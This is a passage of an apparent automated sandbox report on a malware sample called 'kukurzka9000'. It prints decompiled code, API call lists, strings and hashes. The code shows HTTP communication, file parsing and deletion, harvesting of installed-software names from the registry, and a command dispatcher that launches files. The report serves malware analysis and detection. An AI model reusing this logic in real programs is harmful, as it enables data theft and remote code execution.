								_t309 =  *0x40e340; // 0x7ef2b0
								_t215 = E0040A503(E0040A503(E0040A503(_t212, _t309),  *_t227), "\"");
								_t312 =  *0x40e350; // 0x825c60
								_t216 = E0040A503(_t215, _t312);
								_t313 =  *0x40e35c; // 0x819f58
								_t217 = E0040A503(_t216, _t313);
								_t314 =  *0x40e350; // 0x825c60
								_t218 = E0040A503(_t217, _t314);
								_t315 =  *0x40e350; // 0x825c60
								_t220 = E0040A503(E0040A503(_t218, _t315),  *((intOrPtr*)(_t227 + 4)));
								_t317 =  *0x40e350; // 0x825c60
								_t326 = E0040A503(_t220, _t317);
								LocalFree(_t339);
								_t25 =  &_v16;
								 *_t25 = _v16 - 1;
								_t227 = _t227 + 0xc;
							} while ( *_t25 != 0);
							_t224 = _v24;
							_v8 = _t326;
							_t319 = _a4;
							goto L11;
						}
					} else {
						_t223 = 0;
						do {
							_t282 = _t282 + 1;
							 *(_t223 + _t318) = _t229;
							_t223 = _t282 + _t282;
							_t229 =  *(_t223 + _t328) & 0x0000ffff;
						} while (_t229 != _v16);
						goto L7;
					}
				}
			}

0x00407ef0
0x00407ef3
0x00407efd
0x00407f06
0x00407f0f
0x00407f11
0x00407f14
0x004080f3
0x00000000
0x004080f3
0x00407f1c
0x00407f21
0x00000000
0x00407f3c
0x00407f3c
0x00407f46
0x00407f4f
0x00407f51
0x00407f58
0x00407f5a
0x00407f5a
0x00407f5d
0x00407f60
0x00407f66
0x00407f7c
0x00407f82
0x00407f84
0x00407f90
0x00407f9b
0x00407f9d
0x00407fa2
0x00408069
0x0040807f
0x0040808f
0x00408097
0x004080a8
0x004080aa
0x004080ad
0x004080af
0x004080b4
0x0040811f
0x00408122
0x00408129
0x00408133
0x00408275
0x00408281
0x00408283
0x0040828b
0x00408290
0x004082a2
0x004082a7
0x004082af
0x004082c1
0x004082c7
0x004082c8
0x004082cb
0x004082d0
0x004082dc
0x004082dc
0x004082e1
0x004082f2
0x004082f5
0x00408304
0x0040830f
0x00408312
0x00408321
0x00408329
0x00408406
0x0040842a
0x0040842c
0x0040842f
0x00408435
0x0040843a
0x0040843e
0x0040845d
0x00408464
0x00408464
0x0040846b
0x0040846e
0x0040846e
0x00408477
0x0040847e
0x00408487
0x00000000
0x0040832f
0x0040834d
0x00408350
0x00408358
0x0040835a
0x0040835f
0x004083ff
0x00408400
0x00000000
0x00408400
0x00408379
0x00408380
0x00408396
0x00408398
0x0040839b
0x004083a0
0x004083f6
0x004083f9
0x00000000
0x004083f9
0x004083a2
0x004083b8
0x004083ba
0x004083c6
0x004083ec
0x004083ed
0x004083f3
0x00000000
0x004083f3
0x004083da
0x004083e2
0x004083e3
0x004083e4
0x004083e5
0x004083ea
0x00000000
0x00000000
0x004083cf
0x004083d4
0x00000000
0x00000000
0x004083d6
0x004083d6
0x00000000
0x004083da
0x00408329
0x0040813c
0x0040813f
0x00408142
0x0040814b
0x00408153
0x00408156
0x0040815f
0x00408161
0x00408169
0x0040816e
0x00408180
0x00408185
0x0040818d
0x00408192
0x004081b0
0x004081b5
0x004081bd
0x004081c2
0x004081ca
0x004081cf
0x004081d7
0x004081dc
0x004081e4
0x004081f0
0x004081f3
0x004081fb
0x004081fe
0x00408202
0x00408205
0x0040820a
0x0040820c
0x00408212
0x0040821c
0x0040821e
0x0040821f
0x00408222
0x00408223
0x00408229
0x0040822b
0x0040822b
0x00408230
0x00408230
0x00408212
0x0040823a
0x0040823f
0x0040823f
0x00408249
0x0040824e
0x00408257
0x00408257
0x00408260
0x00408266
0x00408269
0x00408269
0x00408272
0x00000000
0x00408272
0x004080be
0x004080bf
0x004080c0
0x004080c1
0x004080c2
0x004080c4
0x004080c7
0x004080c8
0x004080d1
0x004080ff
0x00408104
0x00408106
0x0040810e
0x0040810f
0x00408116
0x0040811c
0x0040811c
0x00408116
0x00000000
0x00408104
0x004080d6
0x004080dd
0x004080e4
0x004080ed
0x00000000
0x00407fa8
0x00407fa8
0x00407fab
0x00407fae
0x00407fb0
0x00407fb3
0x00407fb8
0x00407fc0
0x00407fcb
0x00407fd0
0x00407fd8
0x00407fdd
0x00407ffa
0x00407fff
0x00408007
0x0040800c
0x00408014
0x00408019
0x00408021
0x00408026
0x00408038
0x0040803d
0x0040804b
0x0040804d
0x00408053
0x00408053
0x00408057
0x00408057
0x00408060
0x00408063
0x00408066
0x00000000
0x00408066
0x00407f68
0x00407f68
0x00407f6a
0x00407f6a
0x00407f6b
0x00407f6f
0x00407f72
0x00407f76
0x00000000
0x00407f6a
0x00407f66

APIs

LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 0040804D
LocalFree.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080D6
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080DD
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080E4
LocalFree.KERNEL32(00000001,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080ED
LocalFree.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00408122
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00408129
CloseHandle.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?), ref: 00408230
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040823F
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040824E
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 00408257
LocalFree.KERNEL32(0000002F,?,?,?,?,?,00409B89,00000001,?), ref: 00408260
lstrcpyn.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 004082CC
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 004082E1
InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 00408312
InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 00408321
HttpSendRequestW.WININET(?,00000001,00000000), ref: 004083C2
InternetCloseHandle.WININET(?), ref: 004083ED
InternetCloseHandle.WININET(00000000), ref: 004083F9
InternetCloseHandle.WININET(00000000), ref: 00408400
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 00408422
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 0040845D
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040846E
LocalFree.KERNEL32(00000001,?,?,?,?,?,00409B89,00000001,?), ref: 00408477
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040847E
LocalFree.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?), ref: 00408487

Strings

/, xrefs: 00407F51
rqwrwqrqwrqw, xrefs: 004082FD

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$Internet$CloseHandle$ByteCharMultiOptionWide$DeleteFileHttpRequestSendlstrcpyn
String ID: /$rqwrwqrqwrqw
API String ID: 295309298-865852912
Opcode ID: cc2c2d685f84a46da143ceb1b72dd46e7f22fcb3915adf77100fbecd680e3ecb
Instruction ID: 6c99c45f28bfee67641de8d5d70fad00062f969ed25daf8f75b78222567e1072
Opcode Fuzzy Hash: cc2c2d685f84a46da143ceb1b72dd46e7f22fcb3915adf77100fbecd680e3ecb
Instruction Fuzzy Hash: 84029F71A00215AFDF04EFB6DE45E6E77B5FB88300F008839E915B7290DB78AD118B68

Uniqueness

Uniqueness Score: -1.00%

Function 022B4B2A Relevance: 49.2, APIs: 39, Instructions: 476
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalFree.KERNEL32(00000000), ref: 022B50C2

Part of subcall function 022B9958: LocalFree.KERNEL32(00000000,?,022B32BA,00000002,?), ref: 022B99BD

LocalFree.KERNEL32(00000000), ref: 022B4F20
LocalFree.KERNEL32(?), ref: 022B4F29
LocalFree.KERNEL32(?), ref: 022B4F32
LocalFree.KERNEL32(?), ref: 022B4F39
LocalFree.KERNEL32(00000000), ref: 022B4F43
LocalFree.KERNEL32(?), ref: 022B4F4C
LocalFree.KERNEL32(?), ref: 022B4F55
LocalFree.KERNEL32(?), ref: 022B4F5E
LocalFree.KERNEL32(?), ref: 022B4F67
LocalFree.KERNEL32(?), ref: 022B4F70
LocalFree.KERNEL32(?), ref: 022B4F79
LocalFree.KERNEL32(?), ref: 022B4F82
LocalFree.KERNEL32(?), ref: 022B4F8B

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

LocalFree.KERNEL32(?), ref: 022B4FB4
LocalFree.KERNEL32(?), ref: 022B4FBD
LocalFree.KERNEL32(?), ref: 022B4FC6
LocalFree.KERNEL32(?), ref: 022B4FCF
LocalFree.KERNEL32(?), ref: 022B4FD8
LocalFree.KERNEL32(?), ref: 022B4FE1
LocalFree.KERNEL32(?), ref: 022B4FEA
LocalFree.KERNEL32(?), ref: 022B4FF9
LocalFree.KERNEL32(?), ref: 022B5002
LocalFree.KERNEL32(?), ref: 022B500B
LocalFree.KERNEL32(?), ref: 022B5014
LocalFree.KERNEL32(?), ref: 022B501D
LocalFree.KERNEL32(?), ref: 022B5024
LocalFree.KERNEL32(?), ref: 022B5035
LocalFree.KERNEL32(?), ref: 022B503E
LocalFree.KERNEL32(?), ref: 022B5047
LocalFree.KERNEL32(?), ref: 022B5050
LocalFree.KERNEL32(?), ref: 022B5059
LocalFree.KERNEL32(?), ref: 022B5067
LocalFree.KERNEL32(?), ref: 022B5070
LocalFree.KERNEL32(?), ref: 022B5079
LocalFree.KERNEL32(?), ref: 022B508A
LocalFree.KERNEL32(?), ref: 022B5093
LocalFree.KERNEL32(00000000), ref: 022B509A
LocalFree.KERNEL32(?), ref: 022B50AB

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$Global
String ID:
API String ID: 67877634-0
Opcode ID: 0f12c4ef2a00073fdc66328a61890da27d8bcc0520ef2ea85460475b67c8d6ed
Instruction ID: f2a1ef6f62d6ce736fedd44927f4a77ed92c8e0e1cdf86895791f9951ce577a4
Opcode Fuzzy Hash: 0f12c4ef2a00073fdc66328a61890da27d8bcc0520ef2ea85460475b67c8d6ed
Instruction Fuzzy Hash: 52F1B672910225AFDB159BE6DE48EEEBB75EF48310F044824F905B7260CB705D60CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406D26 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 419
fileCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E00406D26(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, char* _a8) {
				intOrPtr _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				intOrPtr _v64;
				void* _v68;
				void* _v72;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr* _v84;
				intOrPtr* _v88;
				void* _v92;
				intOrPtr _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t132;
				intOrPtr* _t133;
				void* _t140;
				void* _t142;
				char* _t144;
				void* _t146;
				void* _t147;
				void* _t160;
				int _t163;
				void* _t165;
				signed int _t167;
				void* _t190;
				void* _t191;
				void* _t196;
				void* _t209;
				void* _t210;
				signed int _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t228;
				void* _t240;
				signed int _t241;
				void* _t264;
				intOrPtr _t265;
				void* _t267;
				void* _t270;
				void* _t271;
				intOrPtr _t273;
				intOrPtr* _t276;
				void* _t278;

				_v88 = __edx;
				_v84 = __ecx;
				if(_a8 == 0) {
					L50:
					return 0;
				}
				_t104 =  *0x40e38c; // 0x8149d0
				_v76 = _v76 & 0x00000000;
				_v48 = _t104;
				_t105 =  *0x40e380; // 0x814940
				_v80 = _t105;
				_t106 =  *0x40e2cc; // 0x8261a0
				_v52 = _t106;
				_t107 =  *0x40e320; // 0x826020
				_v56 = _t107;
				_t108 =  *0x40e384; // 0x814838
				_v64 = _t108;
				_t110 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_v36 = _t111;
				_t264 =  *((intOrPtr*)( *0x40e000))(_t110, _a4,  *0x40e300);
				_v68 = _t264;
				_t113 = E0040A69E( *0x40e000,  &_v36);
				_t209 = _v36;
				if(_t113 == 0) {
					L48:
					LocalFree(_t264);
					DeleteFileW(_t209);
					LocalFree(_t209);
					L49:
					goto L50;
				}
				_push(0);
				_push(_t209);
				_push(_t264);
				if( *((intOrPtr*)( *0x40e184))() == 0) {
					goto L48;
				}
				_t119 =  *((intOrPtr*)( *0x40e03c))(_t209, 0x80000000, 1, 0, 3, 0, 0);
				_v72 = _t119;
				_t270 =  *((intOrPtr*)( *0x40e14c))(_t119, 0);
				_t121 =  *((intOrPtr*)( *0x40e044))(0x40, _t270);
				_push(0);
				_push( &_v76);
				_t18 = _t270 - 1; // -1
				_v44 = _t121;
				_push(_t121);
				_push(_v72);
				if( *((intOrPtr*)( *0x40e088))() == 0) {
					L43:
					LocalFree(_v44);
					CloseHandle(_v72);
					DeleteFileW(_t209);
					if(_t264 != 0) {
						LocalFree(_t264);
					}
					if(_t209 != 0) {
						LocalFree(_t209);
					}
					return 1;
				}
				_t271 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _a4, 0xffffffff, 0, 0, 0, 0);
				_t22 = _t271 + 0x40; // 0x40
				_t132 =  *((intOrPtr*)( *0x40e044))(0x40, _t22);
				_v40 = _t132;
				if(_t271 == 0) {
					L7:
					_push(_v40);
					_t133 =  *0x40e490; // 0x0
					if( *_t133() != 0) {
						L42:
						 *0x40e4a8();
						LocalFree(_v40);
						goto L43;
					}
					_t228 = _v44;
					_t265 = _t228;
					_push(_t228);
					_v32 = _t265;
					_t273 = 1;
					if( *((intOrPtr*)( *0x40e198))() <= 0x200) {
						L41:
						_t264 = _v68;
						goto L42;
					}
					while(_t273 != 0) {
						_v60 = _v60 & 0x00000000;
						_t140 =  *((intOrPtr*)( *0x40e00c))(_t265, _v48);
						_v20 = _v20 | 0xffffffff;
						_t210 = _t140;
						_v16 = _v16 | 0xffffffff;
						if(_t210 == 0) {
							break;
						}
						_t211 = _t210 - _t265;
						if(_t210 - _t265 < 0) {
							break;
						}
						_t142 =  *((intOrPtr*)( *0x40e00c))(_t265, _v80);
						if(_t142 == 0) {
							_t273 = 0;
						} else {
							_v20 = _t142 - _t265;
						}
						_v8 = _t273;
						_t144 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
						_a8 = _t144;
						_t146 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
						_v24 = _t146;
						_t147 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
						_push(_v20);
						_v28 = _t147;
						if(E0040A457(_t265,  &_a8,  *((intOrPtr*)( *0x40e198))() + _t211, _v48) == 0) {
							L38:
							LocalFree(_a8);
							LocalFree(_v24);
							LocalFree(_v28);
							_t212 = _v16;
							if(_t212 < 0) {
								break;
							}
							_t265 = _t265 +  *((intOrPtr*)( *0x40e198))(_v64) + _t212;
							_push(_t265);
							_v32 = _t265;
							if( *((intOrPtr*)( *0x40e198))() > 0x200) {
								continue;
							}
							break;
						} else {
							_t160 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000);
							_v12 = _t160;
							_t163 = MultiByteToWideChar(0xfde9, 0, _a8,  *((intOrPtr*)( *0x40e198))(_a8) + 1, 0, 0);
							_v20 = _t163;
							if(_t163 != 0) {
								_t267 = _t163 + _t163;
								_t196 =  *((intOrPtr*)( *0x40e044))(0x40, _t267);
								_t216 = _t196;
								MultiByteToWideChar(0xfde9, 0, _a8,  *((intOrPtr*)( *0x40e198))(_a8) + 1, _t216, _v20);
								 *((short*)(_t267 + _t216 - 2)) = 0;
								_v12 =  *((intOrPtr*)( *0x40e13c))(_v12, _t216);
								LocalFree(_t216);
								_t265 = _v32;
								_v60 = 1;
							}
							_t165 =  *((intOrPtr*)( *0x40e00c))(_t265, _v52);
							if(_t165 == 0) {
								L36:
								_t273 = 0;
								L37:
								LocalFree(_v12);
								goto L38;
							}
							_t273 = _v8;
							_t167 = _t165 - _t265;
							_v20 = _t167;
							if(_t167 < 0) {
								goto L37;
							}
							_t213 =  *((intOrPtr*)( *0x40e00c))(_t265, _v56);
							if(_t213 == 0) {
								goto L36;
							}
							_t214 = _t213 - _t265;
							if(_t214 >= 0) {
								_push(_t214);
								if(E0040A457(_t265,  &_v24,  *((intOrPtr*)( *0x40e198))() + _v20, _v52) != 0) {
									_v20 =  *((intOrPtr*)( *0x40e044))(0x40, 0x3f40);
									E00406468(_v24,  &_v20);
									_t240 =  *((intOrPtr*)( *0x40e00c))(_t265, _v64);
									if(_t240 == 0) {
										_t273 = 0;
									} else {
										_t241 = _t240 - _t265;
										_v92 = _t241;
										_v16 = _t241;
										if(_t241 >= 0) {
											_push(_t241);
											_v16 = _t241;
											if(E0040A457(_t265,  &_v28,  *((intOrPtr*)( *0x40e198))() + _t214, _v56) != 0) {
												_v16 =  *((intOrPtr*)( *0x40e044))(0x40, 0x3f40);
												if(E00406468(_v28,  &_v16) != 0 && _v60 != 0) {
													_t190 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
													_t215 = _t190;
													_t191 =  *((intOrPtr*)( *0x40e0ec))(_t215,  *0x40e1a4, _v12, _v20, _v16);
													_t278 = _t278 + 0x14;
													if(_t191 >= lstrlenW( *0x40e1a4)) {
														_t276 = _v84;
														 *_t276 = E0040A503( *_t276, _t215);
													}
													if(_t215 != 0) {
														LocalFree(_t215);
													}
													_t265 = _v32;
													 *_v88 =  *_v88 + 1;
												}
												LocalFree(_v16);
												_t273 = _v8;
												_v16 = _v92;
											}
										}
									}
									LocalFree(_v20);
								}
							}
							goto L37;
						}
					}
					_t209 = _v36;
					goto L41;
				}
				_push(0);
				_push(0);
				_push(_t271);
				_push(_t132);
				_push(0xffffffff);
				_push(_a4);
				_push(0);
				_push(0xfde9);
				if( *((intOrPtr*)( *0x40e0e4))() != 0) {
					goto L7;
				} else {
					LocalFree(_v44);
					LocalFree(_t264);
					LocalFree(_t209);
					LocalFree(_v40);
					goto L49;
				}
			}

APIs

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

LocalFree.KERNEL32(?), ref: 00406E67
LocalFree.KERNEL32(00000000), ref: 00406E6E
LocalFree.KERNEL32(?), ref: 00406E75
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,000000FF,00000001,00000000,00000000), ref: 00406F8B
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,000000FF,00000001,00000000,000000FF), ref: 00406FC5
LocalFree.KERNEL32(00000000), ref: 00406FDD
LocalFree.KERNEL32(?), ref: 004071C6
CloseHandle.KERNEL32(?), ref: 004071CF
DeleteFileW.KERNEL32(?), ref: 004071D6
LocalFree.KERNEL32(00000000), ref: 004071E1
LocalFree.KERNEL32(?), ref: 004071EC
LocalFree.KERNEL32(00000000), ref: 004071F8
DeleteFileW.KERNEL32(?), ref: 004071FF
LocalFree.KERNEL32(?), ref: 00407206

Strings

zh@, xrefs: 00407171, 0040703B, 0040705E

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$ByteCharDeleteFileMultiWide$CloseHandle
String ID: zh@
API String ID: 490209112-2111804587
Opcode ID: c8cbe69cc62f74f5a99b3f19532ac2860d420457c2f59f1cdb0e08b9d8ac2a6d
Instruction ID: f5ae4f6584a7baff5169ccf4eff2fbd10138ea77d31ce010a22c6c2769712165
Opcode Fuzzy Hash: c8cbe69cc62f74f5a99b3f19532ac2860d420457c2f59f1cdb0e08b9d8ac2a6d
Instruction Fuzzy Hash: D6E18471A00215AFEB04DFA6DD85EAEBBB5EF48310F004439FA15B7390DBB46911CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409581 Relevance: 42.3, APIs: 19, Strings: 5, Instructions: 309registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

RegCloseKey.ADVAPI32(00000000), ref: 004095C6
LocalFree.KERNEL32(00000000), ref: 00409631
RegCloseKey.ADVAPI32(000F003F), ref: 0040963A
RegCloseKey.ADVAPI32(00000000), ref: 0040974E
LocalFree.KERNEL32(00000000), ref: 004097D7
RegCloseKey.ADVAPI32(000F003F), ref: 004097E0

Strings

DisplayVersion, xrefs: 004096BC, 00409862
%s %s, xrefs: 004096E0, 00409886
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 004095B3, 00409763
?, xrefs: 00409591
DisplayName, xrefs: 00409683, 00409829

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Close$Free$Locallstrlen$Global
String ID: %s %s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 4129056489-2725056526
Opcode ID: 0d3dbb5b45545043f816d409d6e6463967e53ce16be53e8c1f48be56fbdb61cf
Instruction ID: d80988b05da4082da03304b58d54d9122d1b9f20f569912955d0e5abbda793b7
Opcode Fuzzy Hash: 0d3dbb5b45545043f816d409d6e6463967e53ce16be53e8c1f48be56fbdb61cf
Instruction Fuzzy Hash: 60B16C71A00219BFDB05DFA6DD84EAF7BB9EF49340B104425FA05B7261D7749E10CB68

Uniqueness

Uniqueness Score: -1.00%

Function 022B744F Relevance: 40.7, APIs: 22, Strings: 1, Instructions: 477networkfileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000,00000000), ref: 022B75C1
LocalFree.KERNEL32(?,?,?,?,?,?,022B1C89,00000000,00000000,00000000), ref: 022B764A
LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000,00000000), ref: 022B7651
LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000,00000000), ref: 022B7658
LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000,00000000), ref: 022B7661
LocalFree.KERNEL32(?,?,?,?,?,?,022B1C89,00000000,00000000,00000000), ref: 022B7696
LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000,00000000), ref: 022B769D
CloseHandle.KERNEL32(-00000004,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B77A4
LocalFree.KERNEL32(?,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B77B3
DeleteFileW.KERNEL32(?,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B77C2
LocalFree.KERNEL32(?,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B77CB
LocalFree.KERNEL32(0000002F,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B77D4
LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B7855
InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 022B7886
InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 022B7895
InternetCloseHandle.WININET(?), ref: 022B7961
InternetCloseHandle.WININET(00000000), ref: 022B796D
InternetCloseHandle.WININET(00000000), ref: 022B7974
LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B79E2
LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B79EB
LocalFree.KERNEL32(00000000,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B79F2
LocalFree.KERNEL32(00000001,?,?,?,?,?,022B1C89,00000000,00000000), ref: 022B79FB

Strings

/, xrefs: 022B74C5

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$Internet$CloseHandle$Option$DeleteFile
String ID: /
API String ID: 3877996606-2043925204
Opcode ID: 44b8c5c6b5931157c93208281ed44bf5aaa786017533818b3ea69a1034d7864d
Instruction ID: 55067e16d96285742e21cc3409e782e22672e5ba52338070523b27c36997fa34
Opcode Fuzzy Hash: 44b8c5c6b5931157c93208281ed44bf5aaa786017533818b3ea69a1034d7864d
Instruction Fuzzy Hash: 0A02A071A10215AFDB15DBF5DD44EAEB7B6EF88340F108828EA01B72A4DB74AD50CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004073C7 Relevance: 40.6, APIs: 22, Strings: 1, Instructions: 315
memoryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E004073C7() {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t65;
				void* _t72;
				void* _t79;
				void* _t86;
				void* _t97;
				void* _t108;
				void* _t122;
				void* _t123;
				char _t128;
				void* _t137;
				void* _t139;
				void* _t140;
				void* _t142;
				void* _t144;
				void* _t183;
				intOrPtr _t188;
				void* _t189;
				void* _t190;
				void* _t192;
				void* _t194;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				signed int _t205;
				void* _t207;
				signed int _t209;
				void* _t211;
				signed int _t213;
				void* _t215;
				signed int _t217;
				char _t218;
				void* _t219;
				void* _t222;
				void* _t223;

				_t190 =  *((intOrPtr*)( *0x40e18c))(_t144,  *0x40e3a0, _t189);
				if(_t190 == 0) {
					L41:
					return 0;
				} else {
					while(1) {
						_t192 = _t190 + 8;
						_t65 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t192) + _t63);
						_t137 = _t65;
						_v20 = _t137;
						_t202 =  *((intOrPtr*)( *0x40e18c))(_t192,  *0x40e1f0);
						if(_t202 == 0) {
							break;
						}
						_t205 = _t202 - _t192 >> 1;
						if(E0040A3E4(_t192,  &_v20, 0, _t205) == 0) {
							_t137 = _v20;
							break;
						}
						_t194 = _t192 + _t205 * 2 + 2;
						_t72 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t194) + _t70);
						_t139 = _t72;
						_v12 = _t139;
						_t207 =  *((intOrPtr*)( *0x40e18c))(_t194,  *0x40e20c);
						if(_t207 == 0) {
							L36:
							LocalFree(_t139);
							L34:
							LocalFree(_v20);
							L39:
							L40:
							goto L41;
						}
						_t209 = _t207 - _t194 >> 1;
						if(E0040A3E4(_t194,  &_v12, 0, _t209) == 0) {
							_t139 = _v12;
							goto L36;
						}
						_t196 = _t194 + _t209 * 2 + 2;
						_t79 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t196) + _t77);
						_t140 = _t79;
						_v8 = _t140;
						_t211 =  *((intOrPtr*)( *0x40e18c))(_t196,  *0x40e20c);
						if(_t211 == 0) {
							L33:
							LocalFree(_t140);
							LocalFree(_v12);
							goto L34;
						}
						_t213 = _t211 - _t196 >> 1;
						if(E0040A3E4(_t196,  &_v8, 0, _t213) == 0) {
							_t140 = _v8;
							goto L33;
						}
						_t198 = _t196 + _t213 * 2 + 2;
						_t86 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t198) + _t84);
						_t137 = _t86;
						_v16 = _t137;
						_t215 =  *((intOrPtr*)( *0x40e18c))(_t198,  *0x40e228);
						if(_t215 == 0) {
							L31:
							LocalFree(_v12);
							LocalFree(_v20);
							L29:
							break;
						}
						_t217 = _t215 - _t198 >> 1;
						if(E0040A3E4(_t198,  &_v16, 0, _t217) == 0) {
							_t137 = _v16;
							goto L31;
						}
						_t15 = _t217 + 1; // 0x1
						_t199 = _v20;
						_v32 = _t198 + _t15 * 2;
						_push(_t199);
						if( *((intOrPtr*)( *0x40e074))() != 1) {
							_push(_t199);
							if( *((intOrPtr*)( *0x40e074))() != 2) {
								_push(_t199);
								if( *((intOrPtr*)( *0x40e074))() == 3) {
									ShellExecuteW(0, L"open", _v16, _v12, 0, 0);
								}
							}
							L24:
